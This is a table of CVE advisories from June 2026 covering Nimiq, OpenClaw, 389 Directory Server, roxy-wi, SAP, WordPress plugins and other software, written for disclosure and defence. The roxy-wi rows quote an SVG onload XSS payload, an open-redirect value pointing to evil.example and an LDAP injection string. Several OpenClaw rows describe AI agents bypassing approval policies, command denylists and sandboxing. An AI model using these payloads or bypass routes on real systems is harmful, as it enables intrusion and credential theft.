| nimiq--core-rs-albatross | Nimiq is a Rust implementation of the Nimiq Proof-of-Stake protocol based on the Albatross consensus algorithm. Prior to version 1.4.0, a logic flaw in BlockInclusionProof::is_block_proven causes the function to return true without performing any cryptographic verification when get_interlink_hops yields an empty hop list. This occurs when the target block is at the election block position immediately preceding the election head's epoch. An attacker providing transaction inclusion proofs can forge a MacroBlock header for that epoch position and have it accepted as "proven" without any hash or signature verification. This issue has been patched in version 1.4.0. | 2026-06-09 | 5.9 | CVE-2026-46539 |
| nimiq--core-rs-albatross | Nimiq is a Rust implementation of the Nimiq Proof-of-Stake protocol based on the Albatross consensus algorithm. Prior to version 1.5.0, a remote peer can crash any full node by sending a RequestBatchSet message containing the genesis block's hash. The handler calls get_epoch_chunks which iterates backwards through macro blocks using Policy::macro_block_before. When it reaches the genesis block number, macro_block_before panics with "No macro blocks before genesis block". This issue has been patched in version 1.5.0. | 2026-06-09 | 5.3 | CVE-2026-46543 |
| nimiq--core-rs-albatross | Nimiq is a Rust implementation of the Nimiq Proof-of-Stake protocol based on the Albatross consensus algorithm. Prior to version 1.4.0, a denial-of-service vulnerability exists in the Ed25519 multisig delinearization code path. Ed25519PublicKey::delinearize() in keys/src/multisig/mod.rs called .unwrap() on curve point decompression, which panics when a public key is constructed from 32 bytes that do not represent a valid point on the Ed25519 curve. Ed25519PublicKey construction only validates byte length, not curve membership, so invalid keys can reach the delinearization path and crash the hosting process. This issue has been patched in version 1.4.0. | 2026-06-09 | 4.3 | CVE-2026-46542 |
| OfflineIMAP--OfflineIMAP | OfflineIMAP before 8.0.3 trusts the server's advertised STARTTLS capability prior to authentication, which allows STRIPTLS/man-in-the-middle attacks that take over the connection and extract account credentials in cleartext. | 2026-06-08 | 6.5 | CVE-2020-37248 |
| open-telemetry--opentelemetry-cpp | OpenTelemetry-cpp is the C++ implementation of OpenTelemetry. Prior to release 1.27.0, the OTLP HTTP exporters (traces/metrics/logs) read the full HTTP response into an in-memory vector of bytes without a size cap. This is exploitable for memory exhaustion when the configured collector endpoint is attacker-controlled (or a network attacker can MITM the exporter connection). This vulnerability is fixed in opentelemetry-cpp release 1.27.0. | 2026-06-12 | 5.3 | CVE-2026-44967 |
| openbullet--openbullet2 | OpenBullet2 through version 0.3.2 on Windows contains a credential disclosure vulnerability that allows remote attackers to capture the NTLMv2 hash of the process user by configuring a job proxy source with a UNC path pointing to an attacker-controlled server. When the job starts, the application attempts to load proxies from the UNC path, triggering an SMB authentication attempt that discloses the NTLMv2 hash, which can then be relayed or cracked offline. | 2026-06-08 | 6.5 | CVE-2026-39908 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.6 contains an approval policy bypass vulnerability in the Skill Workshop apply flow that allows agent tool calls to set apply: true despite approvalPolicy: pending configuration. Attackers can exploit this by reaching the affected apply path to apply workshop changes before the expected approval step, potentially modifying configurations without proper authorization. | 2026-06-11 | 6.5 | CVE-2026-53808 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.19 contains an authorization bypass vulnerability in message read actions that skips channel allowlist checks. Lower-trust callers can request messages from channels not intended for them by exploiting insufficient validation in the affected feature, potentially exposing sensitive channel messages. | 2026-06-11 | 6.5 | CVE-2026-53815 |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.24 contains an authorization bypass vulnerability in the MCP loopback feature that allows non-owner callers to skip owner-only tool policies and before-tool-call hooks. Attackers can invoke owner-only behavior through the affected loopback path to execute restricted tools when the feature is enabled and reachable. | 2026-06-11 | 6.6 | CVE-2026-53818 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.12 contains an exec denylist bypass vulnerability in the bundle MCP loopback session-spawn path that allows authenticated callers to bypass intended command restrictions. Attackers can reach the affected bundled MCP session-spawn path to start sessions with broader command reach than intended. | 2026-06-12 | 6.6 | CVE-2026-53820 |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.24 contains a token revocation vulnerability allowing callers with revoked slash tokens to continue executing commands during monitor refresh windows. Attackers can exploit stale token acceptance to invoke slash command behavior briefly after token revocation, potentially executing unauthorized actions depending on operator configuration. | 2026-06-12 | 6.5 | CVE-2026-53824 |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.7 contains an arbitrary file read vulnerability in the memory-wiki ingest feature that allows authenticated Gateway operators with operator.write scope to read local files outside intended ingest sources. Attackers with operator.write access can specify arbitrary local file paths to import file content into wiki memory, bypassing access restrictions. | 2026-06-12 | 6.5 | CVE-2026-53825 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.2 contains a credential exposure vulnerability in message.action forwarding that allows model-controlled metadata to forward action payloads with Gateway credentials to attacker-supplied loopback URLs. Remote attackers can intercept Gateway tokens and action payloads by providing malicious loopback targets through model-controlled action metadata. | 2026-06-12 | 6.5 | CVE-2026-53827 |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.22 contains a webhook secret revocation bypass vulnerability allowing callers with old Slack and Zalo webhook secrets to remain active after secrets.reload. Attackers can exploit the stale-secret window to deliver webhook events after operator-expected secret revocation, potentially accepting previous credentials. | 2026-06-12 | 6.5 | CVE-2026-53830 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.7 contains a hostname validation vulnerability in retry endpoint checks that allows matching hostname prefixes instead of exact hostnames. Attackers can exploit this by crafting a hostname prefix resembling a trusted host to send authentication material to untrusted endpoints. | 2026-06-12 | 6.5 | CVE-2026-53839 |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.26 contains an information disclosure vulnerability in sandboxed session spawning that exposes the real workspace path to child prompts. Attackers can exploit this by spawning child sessions from sandboxed parents to reveal host workspace location or related memory context to child models. | 2026-06-12 | 4.3 | CVE-2026-53826 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.6 contains a configuration enforcement bypass vulnerability in Feishu dynamic-agent bindings that allows authenticated senders to create or update bindings without honoring configured config-write controls. Attackers can exploit this by leveraging the dynamic-agent binding feature to change sender-agent binding state beyond intended policy, potentially enabling unauthorized binding modifications. | 2026-06-12 | 4.3 | CVE-2026-53835 |
| openfga--openfga | OpenFGA is an authorization/permission engine built for developers. Prior to version 1.16.0, when iterator caching is enabled, two distinct check requests can produce the same cache key, leading to OpenFGA reusing an earlier cached result for a subsequent request. This issue has been patched in version 1.16.0. | 2026-06-10 | 5 | CVE-2026-48096 |
| OpenStack--Ironic | In OpenStack Ironic through 35.0.1, when applying a PATCH to update fields in volume properties the user is authorized for, Ironic can return unredacted sensitive information (such as iSCSI credentials). The PATCH outcome is a security issue; the POST outcome is not a security issue. | 2026-06-14 | 6.8 | CVE-2026-54421 |
| pickplugins--Accordions | The Accordions plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Accordion body field in all versions up to, and including, 2.3.23 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Custom-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-09 | 6.4 | CVE-2026-10862 |
| QEMU--Virtio-blk | A flaw was found in QEMU's virtio-blk device. The issue arises because the device does not properly validate the size of input descriptors before writing data. A malicious guest with high privileges could exploit this vulnerability by submitting a malformed virtio-blk SCSI request, leading to an out-of-bounds write in the host heap memory and a potential denial of service (DoS) for the QEMU process. | 2026-06-12 | 6.7 | CVE-2026-48914 |
| QloApps--QloApps | QloApps through 1.7.0 contains a stored cross-site scripting vulnerability in the admin file manager that allows authenticated administrators to inject malicious JavaScript by uploading crafted SVG files. Attackers can embed JavaScript event handlers such as onload within SVG files uploaded through the file manager to execute arbitrary scripts in the browser of any user who subsequently views the file. | 2026-06-08 | 4.8 | CVE-2026-25558 |
| quantumcloud--Simple Link Directory | Simple Link Directory through 9.0.4 interpolates the sld_no_results_found option into a JavaScript string literal without encoding. Because sanitize_text_field leaves quotes intact, a stored payload breaks out of the string and runs script for every page visitor. | 2026-06-10 | 5.4 | CVE-2026-53741 |
| quantumcloud--Simple Link Directory | Simple Link Directory through 9.0.4 echoes embed shortcode attributes into HTML data attributes without escaping in the embedder template. Attackers with contributor access can craft a shortcode attribute that injects an event handler executing in a viewer's browser. | 2026-06-10 | 5.4 | CVE-2026-53742 |
| rahulbhangale--WP Emoticon Rating | The WP Emoticon Rating plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.1. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request, provided they can trick a site administrator into performing an action such as clicking on a link. | 2026-06-09 | 6.1 | CVE-2026-8910 |
| rahulbhangale--WP-Ultimate-Map | The WP-Ultimate-Map plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1. This is due to missing nonce validation on the process_init() function hooked to admin_init, which saves plugin settings (zoom-level, focus-lat, focus-lng, sel_places, sel_routes) via update_option() based solely on the presence of a save-setting POST parameter. Additionally, the saved values (particularly zoom-level) are stored without sanitization and later echoed into an HTML attribute (and inline JavaScript) on the settings page without escaping. This makes it possible for unauthenticated attackers to change plugin settings and inject arbitrary web scripts via a forged request, provided they can trick a site administrator into performing an action such as clicking on a link. | 2026-06-09 | 6.1 | CVE-2026-8907 |
| rahulbhangale--WpMobi | The WpMobi plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.0.3. This is due to missing or incorrect nonce validation on the handleSaveGeneralSettings function. This makes it possible for unauthenticated attackers to modify the plugin's General Settings and, through the unescaped reflection of the app_name attribute, inject arbitrary web scripts into the administrator's browser via a forged request, provided they can trick a site administrator into performing an action such as clicking on a link. The injected script executes even when the supplied app_name value fails validation and is not persisted to the database, because the form is re-rendered with the attacker-supplied in-memory value on validation failure. | 2026-06-09 | 4.3 | CVE-2026-8909 |
| Red Hat--Red Hat Ansible Automation Platform 2 | A path traversal vulnerability was found in awxkit, the CLI tool for AWX. The YAML !include directive does not sanitize file paths, allowing an attacker to craft a malicious YAML file that reads arbitrary YAML-formatted files from the local filesystem when a user imports it using "awx --conf.format yaml import". This is a client-side vulnerability requiring user interaction. | 2026-06-09 | 4.7 | CVE-2026-52902 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in the admin-ui-ext component of Keycloak, which provides extended administrative user interface capabilities. The issue occurs because certain bulk role-removal endpoints fail to perform granular permission checks when deleting role mappings. This allows a delegated administrator with limited permissions to remove highly privileged roles from other users or groups, potentially disrupting administrative access control. | 2026-06-11 | 4.9 | CVE-2026-11986 |
| Red Hat--Red Hat Directory Server 11 | A flaw was found in 389 Directory Server. The Content Synchronization persistent search plugin allows unbounded memory growth when an authenticated client stops reading sync responses, enabling denial of service. Additional race conditions in plugin thread lifecycle can cause crashes during connection teardown or shutdown. | 2026-06-08 | 6.5 | CVE-2026-11611 |
| Red Hat--Red Hat Directory Server 11 | A heap buffer overflow flaw was found in 389 Directory Server. When serializing objectclass definitions, the oc_superior (SUP) field length is omitted from buffer size calculations in read_schema_dse() and schema_oc_to_string(), but the field is still written via strcat(). An attacker with Directory Manager privileges, or a compromised replication supplier, can trigger a server crash by creating objectclasses with long SUP values. This is an incomplete fix variant of CVE-2025-14905. | 2026-06-10 | 6.5 | CVE-2026-11884 |
| Red Hat--Red Hat Directory Server 11 | A flaw was found in 389 Directory Server. The ldap_utf8prev() function reads bytes before the start of a buffer without bounds checking, causing a heap buffer over-read in string filter parsing that may influence internal filter processing behavior. | 2026-06-09 | 5 | CVE-2026-11787 |
| Red Hat--Red Hat Directory Server 11 | A flaw was found in 389 Directory Server. The dereference control plugin does not check for allocation failure before using a BER structure, allowing an unauthenticated remote attacker to crash the LDAP server when the system is under memory pressure. | 2026-06-09 | 5.9 | CVE-2026-11788 |
| Red Hat--Red Hat Directory Server 11 | A flaw was found in 389 Directory Server. A type confusion in the SSO token extended operation handler causes partial stack address information to be disclosed in LDAP responses to authenticated users. | 2026-06-09 | 4.3 | CVE-2026-11785 |
| Red Hat--Red Hat Directory Server 11 | A flaw was found in 389 Directory Server. The SMD5 password storage plugin performs unsigned integer underflow when computing salt length from a crafted password hash shorter than 16 bytes, causing a buffer over-read that crashes the LDAP server during authentication. | 2026-06-09 | 4.9 | CVE-2026-11789 |
| Red Hat--Red Hat Directory Server 11 | A flaw was found in 389 Directory Server. The PBKDF2-SHA256 password storage plugin does not enforce an upper bound on the iteration count extracted from stored password hashes. A privileged attacker who can modify a user's password hash can cause excessive CPU consumption during authentication, resulting in denial of service. | 2026-06-09 | 4.9 | CVE-2026-11790 |
| Red Hat--Red Hat Directory Server 11 | A stack buffer overflow flaw was found in 389 Directory Server. The checkPrefix() function in pw.c copies an attacker-controlled algorithm ID into a 256-byte stack buffer without bounds checking when parsing reversible-encrypted attribute values. An attacker with Directory Manager privileges can crash the LDAP server by storing a crafted credential with an oversized algorithm ID. FORTIFY_SOURCE mitigates this to denial of service only. | 2026-06-09 | 4.9 | CVE-2026-11793 |
| Red Hat--Red Hat Enterprise Linux 10 | An out-of-bounds write vulnerability was found in GStreamer's H.266/VVC PPS picture partition parser in gst-plugins-bad. In the multi-slice-in-tile processing of gst_h266_parser_parse_picture_partition() (gsth266parser.c), the loop iterates without checking that the slice index stays within bounds, writing past three fixed-size arrays (slice_height_in_ctus, slice_top_left_ctu_x, slice_top_left_ctu_y) in the GstH266PPS structure. While the initial proof-of-concept demonstrated a 4-byte out-of-bounds write, the code permits larger writes across multiple iterations. A crafted H.266/VVC media file can trigger this vulnerability. | 2026-06-11 | 6.5 | CVE-2026-53701 |
| Red Hat--Red Hat Enterprise Linux 10 | A stack buffer overflow flaw was found in the GStreamer H.265 codec parser library (gst-plugins-bad). When parsing a buffering period SEI message, the parser uses an incorrect loop bound derived from cpb_cnt_minus1[i] (the loop index) instead of the sub-layer 0 CPB count cpb_cnt_minus1[0] from the referenced Sequence Parameter Set. A crafted H.265 video file or stream can cause the parser to write beyond the bounds of stack-allocated CPB delay arrays, resulting in a crash or potential stack memory corruption. | 2026-06-11 | 6.5 | CVE-2026-53702 |
| Red Hat--Red Hat Enterprise Linux 6 | A content injection vulnerability was found in the ABRT post-create event handler scripts in libreport. The event script queries the systemd journal for log entries matching the crashed process and writes the results to files in the dump directory without sanitizing embedded control characters. A local user can inject arbitrary content into the journal output by embedding newline characters in syslog messages, controlling the content that root writes to dump directory files. | 2026-06-13 | 5.5 | CVE-2026-54231 |
| Red Hat--Red Hat Hardened Images | An integer underflow vulnerability was found in MIT krb5 in the berval2tl_data() function in plugins/kdb/ldap/libkdb_ldap/ldap_principal2.c. The function performs an unsigned subtraction (bv_len - 2) without a prior bounds check. When bv_len is 0 or 1, the subtraction wraps to a large value which is then truncated to uint16_t, yielding 0xFFFE (65534) or 0xFFFF (65535). The subsequent malloc succeeds and memcpy reads up to 65534 bytes from a 0-1 byte buffer, resulting in a heap out-of-bounds read. The attack vector involves a malicious or compromised LDAP KDB backend returning a krbExtraData attribute with bv_len < 2, triggering the underflow when the KDC or kadmind reads principal data. | 2026-06-11 | 5 | CVE-2026-11850 |
| Red Hat--Red Hat Quay 3 | A flaw was found in Quay. The filedrop endpoint accepts any mime type without validation, allowing an authenticated user with repository write access to upload a malicious SVG file containing JavaScript. The file is stored and served inline through the CDN, enabling stored cross-site scripting when a victim visits the archive URL. | 2026-06-08 | 5.4 | CVE-2026-11569 |
| Revolution Slider--Slider Revolution | The Slider Revolution plugin for WordPress is vulnerable to Sensitive Information Disclosure in versions up to and including 7.0.10. This is due to three compounding design flaws: (1) the plugin leaks a valid backend AJAX nonce (revslider_actions) to all authenticated users including Subscribers via the admin_footer hook; (2) the wordpress.create.image_from_url action is explicitly allowlisted in the $user_allowed array, bypassing the administrator-only access control; (3) the create_wordpress_image_from_url() function accepts an attacker-controlled url parameter that is passed to import_media(), where path_or_url_exists() explicitly accepts local filesystem paths (file_exists() && is_readable()) with no restriction to remote HTTP/HTTPS URLs, and @copy() physically copies those files into the publicly accessible /wp-content/uploads/revslider/ai/ directory. The MIME type check trusts the attacker-supplied content_type parameter to derive the destination extension without verifying actual file content, and the source extension blacklist does not block many sensitive types (.sql, .log, .json, .bak, .xml, .csv, .conf, .yml, .yaml, .pem, .key, .crt, .txt, .db, etc.). This makes it possible for authenticated attackers with Subscriber-level access and above to read the contents of server files with non-blacklisted extensions by having them copied to a publicly accessible URL. | 2026-06-09 | 6.5 | CVE-2026-7542 |
| rikyoz--bit7z | bit7z is a cross-platform C++ static library that allows the compression/extraction of archive files. Prior to version 4.0.12, there is an arbitrary file overwrite vulnerability via symlink attack on predictable temp files during archive update. This issue has been patched in version 4.0.12. | 2026-06-10 | 6.1 | CVE-2026-45384 |
| romancartsupport--RomanCart Ecommerce | The RomanCart Ecommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'blclass' attribute (and other attributes) of the romancart_button shortcode in versions up to, and including, 2.0.8. This is due to insufficient input sanitization and output escaping on user supplied attributes within the romancart_button_shortcode() function. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-09 | 6.4 | CVE-2026-8880 |
| roxy-wi--roxy-wi | Roxy-WI is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. In versions 8.2.6.4 and prior, wrap_line (app/modules/common/common.py:181-186) and highlight_word (app/modules/common/common.py:188-192) build raw HTML by string concatenation with no escaping. The frontend (app/static/js/script.js, log-viewer paths) uses .html(data) / .append(data) to inject the response body. Anyone able to write a line into a managed HAProxy/Nginx access log (i.e. anyone who can send an HTTP request to the public LB) can land an `<svg/onload=…>` payload that executes when a Roxy-WI admin opens the log viewer. At time of publication, there are no publicly available patches. | 2026-06-10 | 6.1 | CVE-2026-45560 |
| roxy-wi--roxy-wi | Roxy-WI is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. In versions 8.2.6.4 and prior, the /smon/agent/{version,uptime,status,checks}/<server_ip> family of routes takes the URL path component verbatim into requests.get(f'http://{server_ip}:{agent_port}/...'). The path component is constrained only by Flask's default URL converter, which permits any value (including IPv4 literals like 169.254.169.254, RFC1918 ranges, and 127.0.0.1). At time of publication, there are no publicly available patches. | 2026-06-10 | 6.5 | CVE-2026-45561 |
| roxy-wi--roxy-wi | Roxy-WI is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. In versions 8.2.6.4 and prior, the login flow allow-lists next URLs by rejecting strings containing https:// or http:// substrings, then constructs https://{request.host}{next_url} and the JS client redirects via window.location.replace(). The block does not consider the userinfo@host syntax. next=@evil.example/path produces https://victim.example@evil.example/path, which all modern browsers route to evil.example. At time of publication, there are no publicly available patches. | 2026-06-10 | 6.1 | CVE-2026-45566 |
| roxy-wi--roxy-wi | Roxy-WI is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. In versions 8.2.6.4 and prior, get_ldap_email (app/modules/roxywi/user.py:120-157) builds the LDAP search filter via f-string concatenation. The username URL path parameter is taken verbatim (no checkAjaxInput, no LDAP escape) and inserted; a username like *)(mail=*)(cn=* injects additional clauses, allowing the admin to enumerate or harvest attributes outside the intended record. At time of publication, there are no publicly available patches. | 2026-06-10 | 4.9 | CVE-2026-45559 |
| roxy-wi--roxy-wi | Roxy-WI is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. In versions 8.2.6.4 and prior, GET /history/<service>/<server_ip> re-uses the server_ip path parameter as a user-id when service == 'user', with no authorization check. Any authenticated user - even a guest in an unrelated group - can list any other user's full action audit trail (server IPs touched, configs deployed, services restarted). At time of publication, there are no publicly available patches. | 2026-06-10 | 4.3 | CVE-2026-45563 |
| saas.group--Juicer | Juicer through 1.12.18 fails to escape remote feed API response fields before rendering them on the admin settings page. Attackers controlling the connected feed data can inject script that executes in an administrator's browser when the settings page loads. | 2026-06-10 | 6.1 | CVE-2026-53737 |
| SAP_SE--ODP Data Replication APIs | The Remote Function Call (RFC) modules of the Operational Data Provisioning Data Replication API (ODP-RFC) are missing caller identification of permitted SAP-internal applications and are being used by customer or third-party applications in ways that are not aligned with their intended usage. This could lead to unintended disclosure of data, but does not affect integrity, and poses minimal availability concerns for the application. | 2026-06-09 | 6.6 | CVE-2026-44754 |
| SAP_SE--SAP Business Objects Business Intelligence Platform | SAP Business Objects Business Intelligence Platform does not sufficiently validate email sending parameters supplied by authenticated users, resulting in an email spoofing vulnerability. This vulnerability has a low impact on integrity and does not affect the confidentiality and availability of the application. | 2026-06-09 | 4.3 | CVE-2026-44755 |
| SAP_SE--SAP Fiori (launchpad) | SAP Fiori Launchpad allows attackers to craft malicious URLs that trigger arbitrary service calls on the Fiori domain; when opened by the user, this could compromise accounts by stealing user credentials. Successful exploitation requires adversaries to possess advanced knowledge of the system, causing low impact on Confidentiality and Integrity. Availability of the system is not impacted. | 2026-06-09 | 4.2 | CVE-2026-24315 |
| SAP_SE--SAP MDG (Review Match Groups Application) | SAP MDG (Review Match Groups Application) does not perform the necessary authorization checks for authenticated users. This could allow a low-privileged user to perform actions that would otherwise be restricted, resulting in escalation of privileges. This has a low impact on integrity, while confidentiality and availability are not impacted. | 2026-06-09 | 4.3 | CVE-2026-44750 |
| SAP_SE--SAP NetWeaver AS Java (JDBC Test Servlet) | Due to a reflected cross-site scripting (XSS) vulnerability in SAP NetWeaver JAVA (JDBC Test Servlet), an unauthenticated attacker could craft a URL that embeds a malicious script. If a victim clicks this link, the injected input is processed during web page generation, resulting in the execution of malicious content in the victim's browser. This could allow the attacker to access and/or modify information related to the webclient, impacting the confidentiality and integrity of the application, with no impact to availability. | 2026-06-09 | 6.1 | CVE-2026-44746 |
| SAP_SE--SAP S/4HANA | SAP S/4HANA (On-Premise) contains an SQL injection vulnerability in a remote-enabled function module component that could be exploited by an authenticated attacker to potentially execute unauthorized database queries. This flaw exposes sensitive information to which they should not otherwise have access. The vulnerability has a high impact on the confidentiality of the data with no impact on the integrity and availability of the application. | 2026-06-09 | 6.5 | CVE-2026-44744 |
| SAP_SE--SAP Wily Introscope Enterprise Manager | SAP Wily Introscope Enterprise Manager allows an unauthenticated attacker to craft a malicious URL. Under certain conditions, when accessed by a victim, the injected script could execute in the user's browser within the context of the application. This issue has a low impact on the confidentiality and integrity of the application with no impact on availability. | 2026-06-09 | 4.7 | CVE-2026-44757 |
| shortpixel--Enable Media Replace | The Enable Media Replace plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'location_dir' parameter in all versions up to, and including, 4.1.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-09 | 6.4 | CVE-2026-5714 |
| Siemens--SINEC INS | A vulnerability has been identified in SINEC INS (All versions < V1.0 SP2 Update 6). The affected application does not properly sanitize path input in the `GET /api/sftp/uploadFiles` endpoint used for directory listing. This allows path traversal through crafted input, enabling access to unintended file system locations. | 2026-06-09 | 4.3 | CVE-2026-46747 |
| Siemens--SIPROTEC 5 6MD84 (CP300) | A vulnerability has been identified in SIPROTEC 5 6MD84 (CP300) (All versions), SIPROTEC 5 6MD85 (CP200) (All versions), SIPROTEC 5 6MD85 (CP300) (All versions), SIPROTEC 5 6MD86 (CP200) (All versions), SIPROTEC 5 6MD86 (CP300) (All versions), SIPROTEC 5 6MD89 (CP300) (All versions), SIPROTEC 5 6MU85 (CP300) (All versions), SIPROTEC 5 7KE85 (CP200) (All versions), SIPROTEC 5 7KE85 (CP300) (All versions), SIPROTEC 5 7SA82 (CP100) (All versions), SIPROTEC 5 7SA82 (CP150) (All versions), SIPROTEC 5 7SA86 (CP200) (All versions), SIPROTEC 5 7SA86 (CP300) (All versions), SIPROTEC 5 7SA87 (CP200) (All versions), SIPROTEC 5 7SA87 (CP300) (All versions), SIPROTEC 5 7SD82 (CP100) (All versions), SIPROTEC 5 7SD82 (CP150) (All versions), SIPROTEC 5 7SD86 (CP200) (All versions), SIPROTEC 5 7SD86 (CP300) (All versions), SIPROTEC 5 7SD87 (CP200) (All versions), SIPROTEC 5 7SD87 (CP300) (All versions), SIPROTEC 5 7SJ81 (CP100) (All versions), SIPROTEC 5 7SJ81 (CP150) (All versions), SIPROTEC 5 7SJ82 (CP100) (All versions), SIPROTEC 5 7SJ82 (CP150) (All versions), SIPROTEC 5 7SJ85 (CP200) (All versions), SIPROTEC 5 7SJ85 (CP300) (All versions), SIPROTEC 5 7SJ86 (CP200) (All versions), SIPROTEC 5 7SJ86 (CP300) (All versions), SIPROTEC 5 7SK82 (CP100) (All versions), SIPROTEC 5 7SK82 (CP150) (All versions), SIPROTEC 5 7SK85 (CP200) (All versions), SIPROTEC 5 7SK85 (CP300) (All versions), SIPROTEC 5 7SL82 (CP100) (All versions), SIPROTEC 5 7SL82 (CP150) (All versions), SIPROTEC 5 7SL86 (CP200) (All versions), SIPROTEC 5 7SL86 (CP300) (All versions), SIPROTEC 5 7SL87 (CP200) (All versions), SIPROTEC 5 7SL87 (CP300) (All versions), SIPROTEC 5 7SS85 (CP200) (All versions), SIPROTEC 5 7SS85 (CP300) (All versions), SIPROTEC 5 7ST85 (CP200) (All versions), SIPROTEC 5 7ST85 (CP300) (All versions), SIPROTEC 5 7ST86 (CP300) (All versions), SIPROTEC 5 7SX82 (CP150) (All versions), SIPROTEC 5 7SX85 (CP300) (All versions), SIPROTEC 5 7SY82 (CP150) (All versions), SIPROTEC 5 7UM85 (CP300) (All versions), SIPROTEC 5 7UT82 (CP100) (All versions), SIPROTEC 5 7UT82 (CP150) (All versions), SIPROTEC 5 7UT85 (CP200) (All versions), SIPROTEC 5 7UT85 (CP300) (All versions), SIPROTEC 5 7UT86 (CP200) (All versions), SIPROTEC 5 7UT86 (CP300) (All versions), SIPROTEC 5 7UT87 (CP200) (All versions), SIPROTEC 5 7UT87 (CP300) (All versions), SIPROTEC 5 7VE85 (CP300) (All versions), SIPROTEC 5 7VK87 (CP200) (All versions), SIPROTEC 5 7VK87 (CP300) (All versions), SIPROTEC 5 7VU85 (CP300) (All versions), SIPROTEC 5 Compact 7SX800 (CP050) (All versions). The affected application allows authenticated users to upload arbitrary files using the DIGSI 5 protocol. This could allow an attacker to upload malicious configuration files that could cause a denial of service condition and potentially lead to code execution. | 2026-06-09 | 6.1 | CVE-2025-40808 |
| signalwire--freeswitch | FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.11.0, FreeSWITCH includes a vulnerable function, PREFIX(prologTok)(), in libs/xmlrpc-c/lib/expat/xmltok/xmltok_impl.c, which was cloned from an outdated and vulnerable version in libexpat/libexpat. The function did not receive the corresponding security patch. This issue has been patched in version 1.11.0. | 2026-06-09 | 5.3 | CVE-2026-49472 |
| signalwire--freeswitch | FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.11.1, mod_verto's JSON-RPC handler bound the connection to the client-supplied sessid on the first frame, before the authentication gate. Binding inserts the connection into the global session hash and, on a key collision, drops the prior occupant of that slot - sending it a verto.punt, detaching its calls, and closing its socket. An unauthenticated network attacker who knows a target session UUID could therefore evict the legitimate client. This issue has been patched in version 1.11.1. | 2026-06-09 | 5.3 | CVE-2026-49843 |
| signalwire--freeswitch | FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.11.1, mod_verto's check_auth userauth branch wrote request-supplied userVariables into the connection state before comparing the supplied password. The writes are append-only and the connection is not closed on a failed compare, so values declared on bad-password attempts persisted on the same WebSocket and carried into a subsequent successful login on that connection. This issue has been patched in version 1.11.1. | 2026-06-09 | 4.3 | CVE-2026-49848 |
| Silverpeas--Silverpeas | Silverpeas through 6.4.6 mishandles the "Personal space" feature that is selected when no componentId is set. | 2026-06-10 | 6.5 | CVE-2026-53698 |
| smithyhq--sqladmin | SQLAdmin is a flexible Admin interface for SQLAlchemy models. Prior to version 0.25.1, the ajax_lookup endpoint in application.py bypasses the is_accessible() access control check that all other endpoints enforce. If a developer restricts model access by overriding is_accessible(), an authenticated user can still query that model's data through the ajax_lookup endpoint - silently bypassing the restriction. This issue has been patched in version 0.25.1. | 2026-06-10 | 4.3 | CVE-2026-46645 |
| smub--aThemes Addons for Elementor | The aThemes Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'title_tag' Widget Setting in all versions up to, and including, 1.1.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This affects the Posts Timeline widget as well as the Posts Carousel widget across its default, Banner, and Modern skins, all of which omit the whitelist validation that is correctly applied in the Posts List widget. | 2026-06-10 | 6.4 | CVE-2026-8613 |
| softaculous--Page Builder: Pagelayer Drag and Drop website builder | The Page Builder: Pagelayer - Drag and Drop website builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Anchor block in versions up to, and including, 2.0.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-13 | 6.4 | CVE-2026-3297 |
| softaculous--Page Builder: Pagelayer Drag and Drop website builder | The Page Builder: Pagelayer - Drag and Drop website builder plugin for WordPress is vulnerable to Incorrect Authorization in all versions up to, and including, 2.0.9. This is due to the pagelayer_save_content AJAX handler allowing users with basic post-edit capability to persist pagelayer_contact_templates metadata on posts they can edit (including pending posts), while the unauthenticated pagelayer_contact_submit endpoint later consumes that metadata by user-controlled post/form identifiers without enforcing a privileged or published-context boundary. This makes it possible for authenticated attackers, with Contributor-level access and above, to configure arbitrary contact-form mail templates that are usable through unauthenticated form submission via the contacts parameter. In typical deployments this template feature is configured via Pagelayer Pro UI; however, the vulnerable backend trust path is still present. This issue may be chained with CVE-2026-2442 to increase exploitability and attacker control over outbound email behavior. | 2026-06-13 | 4.3 | CVE-2026-2470 |
